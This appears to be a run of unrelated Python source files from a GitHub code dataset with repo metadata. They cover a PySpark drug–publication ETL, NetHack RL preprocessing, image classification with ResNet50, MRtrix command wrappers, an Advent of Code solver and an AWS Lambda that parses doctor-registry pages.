pubmed_csv_path\n self.pubmec_json_path = pubmed_json_path\n self.output_path = output_path\n self.drug_dao = dao.DrugDao(self.spark, self.drug_path)\n self.clinical_trial_dao = dao.ClinicalTrialDao(self.spark, self.clinical_trial_path)\n self.pubmed_dao = dao.PubmedDao(self.spark, self.pubmec_csv_path, self.pubmec_json_path)\n\n def execute(self):\n \"\"\"\n - Finds the result which represents a link graph between the different drugs and their respective\n mentions in the different PubMed publications, the scientific publications and finally the newpapers\n with the date associated with each of these mentions.\n - Finds the name fo one or serveral newpapers from the json produced by the data pipeline\n that mention the most different drugs.\n - save the two results into output\n :return: the result of the execution\n :type: str\n \"\"\"\n publication_df = self._find_publication_result()\n top_journals_df = self._find_top_journals_result(publication_df)\n\n publiation_dao = dao.PublicationDao(path=self.output_path)\n publiation_dao.write(df=publication_df, destination=\"publication\")\n publiation_dao.write(df=top_journals_df, destination=\"top_journals\")\n\n top_journals = top_journals_df.select(constants.JOURNAL).rdd.flatMap(lambda x: x).collect()\n\n result = (\n f\"Le résultat de publication a été enregistré sur {self.output_path}/publication\\n\"\n \"Le résultat des journax qui mentionnent le plus de médicaments différents:\\n\"\n f\"- {top_journals}\\n\"\n f\"Le résultat a été enregistré sur {self.output_path}/top_journals\"\n )\n return result\n\n def _find_publication_result(self):\n \"\"\"\n Finds the result which represents a link graph between the different drugs and their respective\n mentions in the different PubMed publications, the scientific publications and finally the newpapers\n with the date associated with each of these mentions.\n :return: pyspark.sql.DataFrame\n \"\"\"\n drug_df = self._get_drug_df()\n clinical_trial_df = self._get_clinical_trial_df()\n pubmed_df = self._get_pubmed_df()\n\n columns = [\n constants.DRUG_NAME,\n constants.JOURNAL,\n constants.CLINICAL_TRIAL,\n constants.PUBMED,\n constants.CLINICAL_TRIAL_DATE,\n ]\n\n df1 = self._union(\n left_df=drug_df,\n right_df=clinical_trial_df,\n join_left_column=constants.CLINICAL_TRIAL_SCIENTIFIC_TITLE,\n join_right_column=constants.DRUG_NAME,\n add_column=constants.PUBMED,\n drop_columns=(\n constants.DRUG_ATCCODE,\n constants.CLINICAL_TRIAL_ID,\n ),\n old_columns=[\n constants.CLINICAL_TRIAL_SCIENTIFIC_TITLE,\n constants.CLINICAL_TRIAL_JOURNAL,\n ],\n new_columns=[constants.CLINICAL_TRIAL, constants.JOURNAL],\n select_columns=columns,\n )\n df2 = self._union(\n left_df=drug_df,\n right_df=pubmed_df,\n join_left_column=constants.PUBMED_TITLE,\n join_right_column=constants.DRUG_NAME,\n add_column=constants.CLINICAL_TRIAL,\n drop_columns=(\n constants.DRUG_ATCCODE,\n constants.PUBMED_ID,\n ),\n old_columns=[\n constants.PUBMED_TITLE,\n constants.PUBMED_JOURNAL,\n ],\n new_columns=[constants.PUBMED, constants.JOURNAL],\n select_columns=columns,\n )\n regex = r\"\\\\x[a-f0-9]{2}\"\n df = (\n df1.union(df2)\n .withColumn(\n constants.PUBMED,\n when(col(constants.PUBMED).isNotNull(), lit(\"yes\")).otherwise(lit(\"no\")),\n )\n .withColumn(\n constants.CLINICAL_TRIAL,\n when(col(constants.CLINICAL_TRIAL).isNotNull(), lit(\"yes\")).otherwise(lit(\"no\")),\n )\n .withColumn(\n constants.JOURNAL,\n when(\n col(constants.JOURNAL).isNotNull(),\n trim(regexp_replace(col(constants.JOURNAL), regex, \"\")),\n ),\n )\n )\n df.show()\n return df\n\n def _find_top_journals_result(self, df: DataFrame):\n \"\"\"\n Finds the name fo one or serveral newpapers from the json produced by the data pipeline\n that mention the most different drugs.\n :param: the graph whichs represents a link graph between the different drugs and their respective\n mentions in the different PubMed publications, the scientific publications and finally the newpapers\n with the date associated with each of these mention\n :type: pyspark.sql.DataFrame\n :return: the result\n :type: pyspark.sql.DataFrame\n \"\"\"\n rows = (\n df.select(col(constants.DRUG_NAME), col(constants.JOURNAL))\n .dropDuplicates([constants.DRUG_NAME, constants.JOURNAL])\n .groupBy(col(constants.JOURNAL))\n .agg(count(\"*\").alias(constants.DRUGS_COUNT))\n )\n max_count = rows.agg({constants.DRUGS_COUNT: \"max\"}).collect()[0][0]\n print(max_count, type(max_count))\n\n rows = rows.filter(rows[constants.DRUGS_COUNT] == max_count)\n rows.show()\n return rows\n\n def _union(\n self,\n left_df: DataFrame,\n right_df: DataFrame,\n join_left_column: str,\n join_right_column: str,\n add_column: str,\n drop_columns: tuple,\n old_columns: list,\n new_columns: list,\n select_columns: list,\n ):\n df = (\n left_df.join(\n right_df,\n upper(right_df[join_left_column]).contains(upper(left_df[join_right_column])),\n \"left\",\n )\n .na.drop()\n .withColumn(add_column, expr(\"null\"))\n .drop(*drop_columns)\n )\n df = utils.rename_columns(\n df=df,\n old_columns=old_columns,\n new_columns=new_columns,\n )\n return df.select(select_columns)\n\n def _get_drug_df(self):\n return self.drug_dao.read()\n\n def _get_clinical_trial_df(self):\n return self.clinical_trial_dao.read()\n\n def _get_pubmed_df(self):\n return self.pubmed_dao.read()\n","repo_name":"liuflorent/drug-publication-etl","sub_path":"src/service/publication_service.py","file_name":"publication_service.py","file_ext":"py","file_size_in_byte":7498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30658571916","text":"# Code for preprocessing\nimport cv2\nimport os\n\nimport numpy as np\nimport torch\n\nfrom PIL import Image, ImageFont, ImageDraw\nfrom numba import njit\n\nfrom rl_baseline.obs_wrappers import COLORS, VectorFeaturesWrapper, initialize_char_array, tile_characters_to_image\n\n\nclass GPT5BaselineTransform:\n def __init__(self, font_size=9, crop_size=12, rescale_font_size=(6, 6)):\n self.char_array = initialize_char_array(font_size, rescale_font_size)\n self.char_height = self.char_array.shape[2]\n self.char_width = self.char_array.shape[3]\n # Transpose for CHW\n self.char_array = self.char_array.transpose(0, 1, 4, 2, 3)\n\n self.crop_size = crop_size\n\n # Render only crop region\n self.half_crop_size = crop_size // 2\n self.output_height_chars = crop_size\n self.output_width_chars = crop_size\n\n self.chw_image_shape = (\n 3,\n self.output_height_chars * self.char_height,\n self.output_width_chars * self.char_width\n )\n\n def __call__(self, minibatch):\n \n # Dataset would look like this. BS is batch size, L is the length of a sequence\n bl_stats = minibatch['blstats'].astype(np.int32) # Size (2, L, 27) \n chars = minibatch['tty_chars'] # Size (2, L, 24, 80)\n colors = minibatch['tty_colors'] # Size (2, L, 24, 80)\n message = minibatch['message'] # Size (2, L, 256)\n\n seq_shape = bl_stats.shape[:-1]\n tty_shape = chars.shape[-2:]\n bl_stats = bl_stats.reshape((-1, bl_stats.shape[-1]))\n\n norm_bl_stats = (bl_stats * VectorFeaturesWrapper.BLSTAT_NORMALIZATION_STATS).astype(np.float32)\n np.clip(\n norm_bl_stats,\n VectorFeaturesWrapper.BLSTAT_CLIP_RANGE[0],\n VectorFeaturesWrapper.BLSTAT_CLIP_RANGE[1],\n out=norm_bl_stats\n )\n\n if self.crop_size:\n # Center around player\n center_xs = bl_stats[:, 0].astype(int)\n center_ys = bl_stats[:, 1].astype(int)\n offset_hs = center_ys - self.half_crop_size\n offset_ws = center_xs - self.half_crop_size\n\n cropped_views = np.zeros((np.prod(seq_shape), *self.chw_image_shape), dtype=np.uint8)\n for i, (char, color, offset_h, offset_w) in enumerate(zip(chars.reshape(-1, *tty_shape), colors.reshape(-1, *tty_shape), offset_hs, offset_ws)):\n \n tile_characters_to_image(\n out_image=cropped_views[i],\n chars=char,\n colors=color,\n output_height_chars=self.output_height_chars,\n output_width_chars=self.output_width_chars,\n char_array=self.char_array,\n offset_h=offset_h,\n offset_w=offset_w\n )\n cropped_views = cropped_views.reshape(seq_shape + cropped_views.shape[1:])\n norm_bl_stats = norm_bl_stats.reshape(seq_shape + norm_bl_stats.shape[1:])\n\n batch = {}\n batch[\"obs\"] = cropped_views\n batch[\"message\"] = message\n batch[\"vector_obs\"] = norm_bl_stats\n \n # Pass through all the keys that are not used in the transform\n for key, value in minibatch.items():\n if key not in ['blstats', 'message']:\n batch[key] = value\n return batch\n\n\nclass ToTensorDict(object):\n \"\"\"Convert a dict of ndarrays in a dict of Tensors.\"\"\"\n def __call__(self, sample):\n tensor_dict = {}\n for key, value in sample.items():\n if key =='idx':\n tensor_dict[key] = value\n elif np.issubdtype(value.dtype, np.number) or value.dtype == bool:\n tensor_dict[key] = torch.from_numpy(np.array(value))\n else:\n tensor_dict[key] = np.array(value)\n return tensor_dict\n\n\nclass DictAsAttributes:\n def __init__(self, data_dict):\n self.__dict__['_data_dict'] = data_dict\n\n def __getattr__(self, key):\n if key in self._data_dict:\n return self._data_dict[key]\n else:\n raise AttributeError(f\"'DictAsAttributes' object has no attribute '{key}'\")\n\n def __setattr__(self, key, value):\n self._data_dict[key] = value\n\n def __delattr__(self, key):\n del self._data_dict[key]","repo_name":"facebookresearch/motif","sub_path":"utils/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"67"} +{"seq_id":"37391604181","text":"#%%\nimport nltk\nimport json\nimport re\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport textwrap\n#%%\nwith open(\"../story_characters.json\", \"r\") as fp:\n data = json.load(fp)\ndata\n\n#%%\nwith open(\"../dataset/metadata.json\", \"r\") as fp:\n metadata = json.load(fp)\nmetadata\n\n# %%\ncombined_names=[]\nfor i in data.values():\n for j in i:\n combined_names.append(j)\nprint (combined_names)\n\n# %%\n\ndistinct_names = []\nfor name in combined_names:\n if name not in distinct_names:\n distinct_names.append(name)\nprint(distinct_names)\nr = re.compile(\"'Sherlock'\")\na = list(filter(r.match,distinct_names))\nprint(a) #none =)\n# %%\n#count number of Holmes appearance in each story \ncounts = []\nfor v in data.values():\n s = sum('Holmes' in name for name in v)\n counts.append(s)\nprint(counts)\n\n# %%\nstory_collection = {}\n\nfor collection_id, collection in metadata['collections'].items():\n for story in collection[\"stories\"].keys():\n story_collection[story] = collection[\"title\"]\nprint(story_collection)\n# %%\n# %%\nstories = data.keys()\ndf = pd.DataFrame(stories, columns = ['Story'])\ndf[\"Counts of Holmes\"] = counts\ncollections = []\nfor story in stories:\n collections.append(story_collection[story])\ndf[\"Collection\"] = collections\nprint(df)\n\n# %%\norder=[\"The Adventures of Sherlock Holmes\", \n\"The Memoirs of Sherlock Holmes\", \n\"The Return of Sherlock Holmes\", \n\"His Last Bow\", \n\"The Case-Book of Sherlock Holmes\"]\nplt.figure()\nsns.set_style(\"whitegrid\")\ng = sns.boxplot( x=df[\"Collection\"], y=df[\"Counts of Holmes\"], width=0.3, order = order)\ng.set_ylabel(\"Appearance of 'Holmes'\")\ng.set_xticklabels(g.get_xticklabels(),rotation=90)\ng.set_xticklabels(textwrap.fill(x.get_text(), 20) for x in g.get_xticklabels())\ng.set_title('Number of appearances of Sherlock in different collecions')\nplt.tight_layout()\nplt.savefig('appearances_of_Sherlock.png')\n# %%\n","repo_name":"Mesi12/um_2021_text_mining","sub_path":"w_questions/corenlp_sent-by-sent/visualisation/appearances_of_Holmes.py","file_name":"appearances_of_Holmes.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28238201297","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#import bibliotek\nfrom keras.applications.resnet50 import ResNet50, decode_predictions,preprocess_input\nfrom keras.preprocessing import image\n\nimport numpy as np\nimport requests\nfrom io import BytesIO \nfrom PIL import Image\n\n\n# In[2]:\n\n\n#podbranie modelu ResNet50\nmodel = ResNet50(weights = 'imagenet')\n\n\n# In[3]:\n\n\n#architektura modelu ResNet50\nmodel.summary()\n\n\n# ## Import zdjecia z internetu\n# #wyświetla zdjecie w jupyterze\n# \n# \n# \n# ![] (link)\n# \n\n# ![](https://natgeo.imgix.net/syndication/d03e14b9-ccf2-40d2-9612-997a20d35b4a/magazine-rights-exempt-2016-08-departments-panda-mania-12.jpg?auto=compress,format&w=1024&h=560&fit=crop)\n\n# ![](https://www.google.com/url?sa=i&source=imgres&cd=&cad=rja&uact=8&ved=2ahUKEwiFvvuM8MLhAhWHyKQKHSxsBEoQjRx6BAgBEAU&url=https%3A%2F%2Fwww.nationalgeographic.com.au%2Fanimals%2Fwho-discovered-the-panda.aspx&psig=AOvVaw2_1mzwUKFN5triJdvHotFY&ust=1554894652416632)\n\n# In[4]:\n\n\n#import zdjecia z internetu\nurl_img = ('https://natgeo.imgix.net/syndication/d03e14b9-ccf2-40d2-9612-997a20d35b4a/magazine-rights-exempt-2016-08-departments-panda-mania-12.jpg?auto=compress,format&w=1024&h=560&fit=crop')\n\nresponse = requests.get(url_img)\n\n#zmiana na Bytes\nimg = Image.open(BytesIO(response.content))\n\n#rozmiar zdjecia 224x 224 bo taki wymaga model\nimg = img.resize((224,224))\nimg\n\n\n# In[5]:\n\n\n# konwersja zdjecia na tablice o wartosciach 0-255\nX = image.img_to_array(img)\n\n#dodanie nowego wymiaru bo model przyjmuje 4 wymiary\nX = np.expand_dims(X, axis =0)\n\n#(1,,224,224,3)\n# 1 - zdjecie\n# 224 - rozmiar\n# 224 - rozmiar\n# 3 - RBG\nX.shape\n\n\n# In[6]:\n\n\nnp.expand_dims(X, axis =0).shape\n\n\n# In[7]:\n\n\n#predykcja\ny_pred = model.predict(X)\n\n\n# In[8]:\n\n\n#prawdopodobieństwo co jest na zdjęciu\ndecode_predictions(y_pred, top = 5)\n\n\n# In[9]:\n\n\n#inne przypadki\nurl_money =('http://3.bp.blogspot.com/-CU3Mg-LeVC4/VWSAi6Ff3dI/AAAAAAAAAkM/UnHJHUkba3c/s400/IMG_9240.JPG')\nurl_dolar =('https://s3.amazonaws.com/ngccoin-production/us-coin-explorer-category/2718362-020o.jpg')\nurl_kasa =('https://ocdn.eu/pulscms-transforms/1/MesktkpTURBXy82NDZmNjk1MTExMzVmN2Q5ZmMwMWE1YjUxODU5YzdkNC5qcGeSlQMAAM0QbM0JPZMFzQNSzQHe')\nurl_snow =('https://miastodzieci.pl/wp-content/uploads/2015/09/snowman-1073800_1920.jpg') \nurl_dolares = ('https://wf2.xcdn.pl/files/17/04/12/984916_hI4O_17123251389_bed3c3a1ba_b_83.jpg')\nurl_cash = ('http://m.wm.pl/2018/07/orig/pieniadze-22-482228.jpg')\n\nresponse = requests.get(url_cash)\nimg = Image.open(BytesIO(response.content))\n\n#rozmiar zdjecia 224x 224\nimg = img.resize((224,224))\nimg\n\n\n# In[10]:\n\n\nX = image.img_to_array(img)\nX = np.expand_dims(X, axis =0)\nX.shape\n\n\n# In[11]:\n\n\n#predykcja\ny_pred = model.predict(X)\n\n\n# In[12]:\n\n\n#prawdopodobieństwo co jest na zdjęciu\ndecode_predictions(y_pred, top = 5)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"toskpl/Challenge_DW","sub_path":"part2/day2/day2 - pandas image.py","file_name":"day2 - pandas image.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"71526235415","text":"from sklearn.model_selection import GridSearchCV\nimport numpy as np\nimport pandas as pd\nfrom sklearn.neural_network import MLPClassifier\ntrain = pd.read_excel('stats.xls', sheet_name='train')\ntest = pd.read_excel('stats.xls', sheet_name='test')\n\n\narray_train = train.values\narray_test = test.values\n\nX = array_train[0:, 1:11]\ny = np.asarray(train['状态'], dtype=\"|S6\")\nX_test = array_test[0:, 1:11]\n\n# Set the parameters by cross-validation\n# MLPClassifier(hidden_layer_sizes=(100,), activation='identity', solver='adam', alpha=0.01,\n# batch_size='auto', learning_rate='adaptive', learning_rate_init=0.0001,\n# power_t=0.5, max_iter=200000, shuffle=True, random_state=None, tol=0.0001,\n# verbose=False, warm_start=False, momentum=0.9, nesterovs_momentum=True,\n# early_stopping=False, validation_fraction=0.2, beta_1=0.9, beta_2=0.99, epsilon=1e-08),\n\ntuned_parameters = [{'learning_rate_init': [0.001, 0.002, 0.003],\n 'alpha': [0.01, 0.05, 0.1, 0.5],\n 'power_t': [0.2, 0.3, 0.4, 0.5],\n 'momentum':[0.5, 0.6, 0.7, 0.8, 0.9],\n 'validation_fraction':[0.1, 0.2, 0.3, 0.4, 0.5]\n }]\n\nscores = ['precision', 'recall']\n\nfor score in scores:\n print(\"# Tuning hyper-parameters for %s\" % score)\n print()\n\n clf = GridSearchCV(MLPClassifier(), tuned_parameters, cv=5,\n scoring='%s_macro' % score)\n clf.fit(X, y)\n\n print(\"Best parameters set found on development set:\")\n print()\n print(clf.best_params_)\n print()\n print(\"Grid scores on development set:\")\n print()\n means = clf.cv_results_['mean_test_score']\n stds = clf.cv_results_['std_test_score']\n for mean, std, params in zip(means, stds, clf.cv_results_['params']):\n print(\"%0.3f (+/-%0.03f) for %r\"\n % (mean, std * 2, params))\n print()\n\n print(\"Detailed classification report:\")\n print()\n print(\"The model is trained on the full development set.\")\n print(\"The scores are computed on the full evaluation set.\")\n print()\n\n","repo_name":"dilmuratjohn/python","sub_path":"programs/graduation-project/optimize for Neural Net.py","file_name":"optimize for Neural Net.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"7461246621","text":"import random\n\nclass RoutePlanner(object):\n \"\"\"Silly route planner that is meant for a perpendicular grid network.\"\"\"\n\n def __init__(self, env, agent):\n self.env = env\n self.agent = agent\n self.destination = None\n\n def route_to(self, destination=None):\n self.destination = destination if destination is not None else random.choice(self.env.intersections.keys())\n #print \"RoutePlanner.route_to(): destination = {}\".format(destination) # [debug]\n\n def get_delta(self):\n \"\"\"\n get the horizontal and vertical distance\n between location and destination.\n \"\"\"\n location = self.env.agent_states[self.agent]['location']\n grid_size = self.env.grid_size\n heading = self.env.agent_states[self.agent]['heading']\n delta = [0, 0]\n for i in range(2):\n # 1st option: destination to the east/south of location\n if self.destination[i] > location[i]:\n # two possible distances, going east/south or\n # going west/north\n possible_delta = [self.destination[i] - location[i], \n location[i] + grid_size[i] - self.destination[i]]\n # if both are the same, check the heading\n if possible_delta[0] == possible_delta[1]:\n # if agent is turned toward this axis,\n # pick direction it is turned to\n if heading[i]:\n delta[i] = possible_delta[0] * heading[i]\n # if it isn't, pick the distance to the right\n # (it's easier to turn right than left)\n elif i: # north/south axis: negate heading to go right\n delta[i] = possible_delta[0] * -sum(heading)\n else: # west/east axis: right is same sign as heading\n delta[i] = possible_delta[0] * sum(heading)\n # if the first distance is the smallest, pick it\n elif min(possible_delta) == possible_delta[0]:\n delta[i] = possible_delta[0]\n # if seconde distance is the smallest, pick minus it\n # (the agent will have to go west/north to get to a point\n # to the east/south)\n else:\n delta[i] = -possible_delta[1]\n # 2nd option: destination to the west/north of location\n else:\n # two possible distances, going west/north or\n # going east/south\n possible_delta = [location[i]-self.destination[i], self.destination[i] + grid_size[i] - location[i]]\n # if both are the same, check the heading \n if possible_delta[0] == possible_delta[1]:\n # if agent is turned toward this axis,\n # pick direction it is turned to\n if heading[i]:\n delta[i] = abs(possible_delta[0]) * heading[i]\n # if it isn't, pick the distance to the right\n # (it's easier to turn right than left)\n elif i: # north/south axis: negate heading to go right\n delta[i] = possible_delta[0] * -sum(heading)\n else: # west/east axis: right is same sign as heading\n delta[i] = possible_delta[0] * sum(heading)\n # if the first distance is the smallest, pick minus it\n # (the agent will have to go west/north)\n elif min(possible_delta) == possible_delta[0]:\n delta[i] = -possible_delta[0]\n # if second distance is smallest, pick it\n else:\n delta[i] = possible_delta[1]\n # return a tuple\n return tuple(delta)\n\n def next_waypoint(self):\n \"\"\"\n Calculate the next waypoint.\n \"\"\"\n # get delta from destination\n self.delta = self.get_delta()\n delta = self.delta\n\n # get agent heading \n heading = self.env.agent_states[self.agent]['heading']\n \n # if agent is turned to the east/west axis\n if heading[0]:\n # if it needs to go forward, do it\n if delta[0] * heading[0] > 0:\n return 'forward'\n # else check if it needs to go backward\n elif delta[0] * heading[0] < 0:\n if delta[1] * heading[0] > 0:\n return 'right'\n else:\n return 'left'\n elif delta[1] * heading[0] > 0:\n return 'right'\n else:\n return 'left'\n else:\n if delta[1] * heading[1] > 0:\n return 'forward'\n elif delta[1] * heading[1] < 0:\n if delta[0] * heading[1] < 0:\n return 'right'\n else:\n return 'left'\n elif delta[0] * heading[1] < 0:\n return 'right'\n else:\n return 'left'\n","repo_name":"lmurtinho/mlend_ps4_smartcab","sub_path":"smartcab/perfect_planner.py","file_name":"perfect_planner.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"1409922157","text":"import subprocess\nimport os\nimport re\n\n\ndef option_dict_to_list(options: dict, reverse: bool):\n options_list = []\n for i_key, i_value in options.items():\n if type(i_value) is str:\n if reverse:\n options_list.extend([str(i_value), \"-\" + str(i_key)])\n else:\n options_list.extend([\"-\" + str(i_key), str(i_value)])\n elif type(i_value) is list:\n options_list.append(\"-\" + str(i_key))\n for i_i_value in i_value:\n options_list.append(i_i_value)\n elif type(i_value) is tuple:\n for i_i_value in i_value:\n # print(i_i_value.split(\" \"))\n temp = [\"-\" + str(i_key)]\n temp.extend(i_i_value.split(\" \"))\n options_list.extend(temp)\n elif i_value is None:\n options_list.append(\"-\" + str(i_key))\n return options_list\n\n\ndef add_options_to_command(command, options, reverse=False):\n if options is not None:\n command.extend(option_dict_to_list(options, reverse))\n return command\n else:\n return command\n\n\ndef parse_mrtrix_output(mrtrix_output):\n stderr_message = mrtrix_output.stderr.decode(\"utf-8\")\n print(stderr_message)\n\n warning_message = re.search(\"\\[WARNING\\](.*\\n)\", stderr_message)\n n_warning_messages = len(warning_message.groups()) if warning_message is not None else 0\n out_warning_messages = []\n if n_warning_messages > 0:\n for i_group_warning_message in range(n_warning_messages):\n out_warning_messages.append(warning_message.groups(i_group_warning_message)[0].strip())\n\n error_message = re.search(\"\\[ERROR\\](.*\\n)\", stderr_message)\n n_error_messages = len(error_message.groups()) if error_message is not None else 0\n out_error_messages = []\n if n_error_messages > 0:\n for i_group_error_message in range(n_error_messages):\n i_error_message = error_message.groups(i_group_error_message)[0].strip()\n # print(\"Error: \" + i_error_message)\n\n\ndef mrconvert(in_file: str, out_file: str, options: dict = None):\n command = [\"mrconvert\"]\n command.append(in_file)\n add_options_to_command(command, options)\n command.append(out_file)\n print(command)\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef mrcat(in_files: list, out_file: str):\n\n command = [\"mrcat\"]\n command.extend(in_files)\n\n command.append(out_file)\n\n # print(command)\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef mrinfo(in_file: str, options: dict):\n command = [\"mrinfo\"]\n command.append(in_file)\n add_options_to_command(command, options)\n\n # command.append(out_file)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef dwi2adc(in_file: str, out_file: str, options: dict):\n command = [\"dwi2adc\"]\n command.append(in_file)\n\n add_options_to_command(command, options)\n\n command.append(out_file)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef mrcalc(in_file: str, out_file: str, options: dict):\n command = [\"mrcalc\"]\n command.append(in_file)\n\n add_options_to_command(command, options, reverse=True)\n\n command.append(out_file)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef dwishellmath(in_file: str, out_file: str, operation: str):\n command = [\"dwishellmath\"]\n command.append(in_file)\n command.append(operation)\n command.append(out_file)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef mrmath(in_file: str, out_file: str, operation: str, options: dict):\n command = [\"mrmath\"]\n command.append(in_file)\n command.append(operation)\n add_options_to_command(command, options)\n command.append(out_file)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef dwi2tensor(in_file: str, out_file: str, options: dict):\n command = [\"dwi2tensor\"]\n command.append(in_file)\n\n add_options_to_command(command, options)\n\n command.append(out_file)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef tensor2metric(in_file: str, options: dict):\n command = [\"tensor2metric\"]\n command.append(in_file)\n\n add_options_to_command(command, options)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef dwiextract(in_file: str, out_file: str, options: dict):\n command = [\"dwiextract\"]\n command.append(in_file)\n\n add_options_to_command(command, options)\n command.append(out_file)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n","repo_name":"Svdvoort/dwipy","sub_path":"dwipy/mrtrixpy.py","file_name":"mrtrixpy.py","file_ext":"py","file_size_in_byte":4843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23374928923","text":"from collections import deque\n\n\ndef parse_file(input):\n with open(input) as file:\n for line in file:\n yield \"\".join(line.split()) # remove all whitespace\n\n\ndef solve(chars):\n \"\"\"1+(2*3)+(4*(5+6))\"\"\"\n result = 0\n multiplier = 1\n\n while chars:\n char = chars.popleft()\n\n if char.isdigit():\n result += multiplier * int(char)\n elif char == '*':\n multiplier = result\n result = 0\n elif char == '(':\n result += multiplier * solve(chars)\n elif char == ')':\n break\n\n return result\n\n\ndef main(expressions):\n return sum([solve(deque(expr)) for expr in expressions])\n\n\nTEST_INPUT = [('1 + 2 * 3 + 4 * 5 + 6', 231),\n ('1 + (2 * 3) + (4 * (5 + 6))', 51),\n ('2 * 3 + (4 * 5)', 46),\n ('5 + (8 * 3 + 9 + 3 * 4 * 3)', 1445),\n ('5 * 9 * (7 * 3 * 3 + 9 * 3 + (8 + 6 * 4))', 669060),\n ('((2 + 4 * 9) * (6 + 9 * 8 + 6) + 6) + 2 + 4 * 2', 23340)\n ]\n\n\ndef test(test_input):\n test_results = []\n for (puzzle_input, expected) in test_input:\n solution = solve(deque(\"\".join(puzzle_input.split())))\n test_results.append((puzzle_input, solution, expected))\n for puzzle_input, solution, expected in test_results:\n\n print(puzzle_input,\n 'solution:', solution,\n 'expected:', expected,\n ('failed', expected - solution) if solution != expected else '')\n\n\ntest(TEST_INPUT)\n\n\nhomework_sum = main(parse_file(\"18-01-input.txt\"))\nprint(\"solution:\", homework_sum)\n","repo_name":"punkrockpolly/aoc","sub_path":"2020/18-02-OperationOrder.py","file_name":"18-02-OperationOrder.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42395181720","text":"import json\nimport boto3 \nimport requests\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nimport base64\nfrom botocore.exceptions import ClientError\n\n\ndef extract_texts(html_file):\n soup = BeautifulSoup(html_file, features=\"html.parser\")\n texts = soup.find_all(text=True)\n return texts\n\ndef get_secret():\n\n secret_name = \"opensearch_credentials\"\n region_name = \"us-east-1\"\n\n # Create a Secrets Manager client\n session = boto3.session.Session()\n client = session.client(\n service_name='secretsmanager',\n region_name=region_name\n )\n\n # In this sample we only handle the specific exceptions for the 'GetSecretValue' API.\n # See https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html\n # We rethrow the exception by default.\n\n try:\n get_secret_value_response = client.get_secret_value(\n SecretId=secret_name\n )\n except ClientError as e:\n if e.response['Error']['Code'] == 'DecryptionFailureException':\n # Secrets Manager can't decrypt the protected secret text using the provided KMS key.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InternalServiceErrorException':\n # An error occurred on the server side.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidParameterException':\n # You provided an invalid value for a parameter.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidRequestException':\n # You provided a parameter value that is not valid for the current state of the resource.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'ResourceNotFoundException':\n # We can't find the resource that you asked for.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n else:\n # Decrypts secret using the associated KMS CMK.\n # Depending on whether the secret is a string or binary, one of these fields will be populated.\n if 'SecretString' in get_secret_value_response:\n secret = get_secret_value_response['SecretString']\n else:\n decoded_binary_secret = base64.b64decode(get_secret_value_response['SecretBinary'])\n return json.loads(secret)\n \n \ndef extract_practice_info(clinician_html, mcr):\n '''\n extract primary/secondary practice places\n '''\n profile = {}\n profile['mcr'] = mcr\n result = extract_texts(clinician_html)\n \n try:\n full_name = [r for r in result if mcr in r]\n profile['full_name'] = full_name[0][:-10]\n except:\n full_name = 'error'\n\n try:\n spec_patterns = [\n 'Specialty / Entry date into the Register of Specialists', \n 'Sub-Specialty / Entry date into the Register of Specialists'\n ]\n specialty = [result[i+1] for i, s in enumerate(result) if s in spec_patterns]\n specialty = specialty[0].strip()\n\n primary_hci = [result[i+4] for i, s in enumerate(result) if s=='Primary Place of Practice']\n profile['specialty'] = specialty\n profile['primary'] = primary_hci[0].strip()\n except:\n pass\n \n if 'Secondary Place of Practice' not in result:\n pass \n else:\n try:\n secondary_hcis = [result[i+4] for i, s in enumerate(result) if s=='Secondary Place of Practice']\n profile['secondary'] = [r.strip() for r in secondary_hcis]\n except:\n # raise Exception()\n pass\n return profile \n\ndef get_from_s3(mcr):\n s3 = boto3.client('s3')\n folder_prefix = datetime.today().strftime('%y%m%d')\n filename = f'{folder_prefix}/{mcr}.html'\n html_object = s3.get_object(Bucket='doctor-profiles', Key=filename)\n html_text = html_object['Body'].read().decode('utf-8')\n profile = extract_practice_info(html_text, 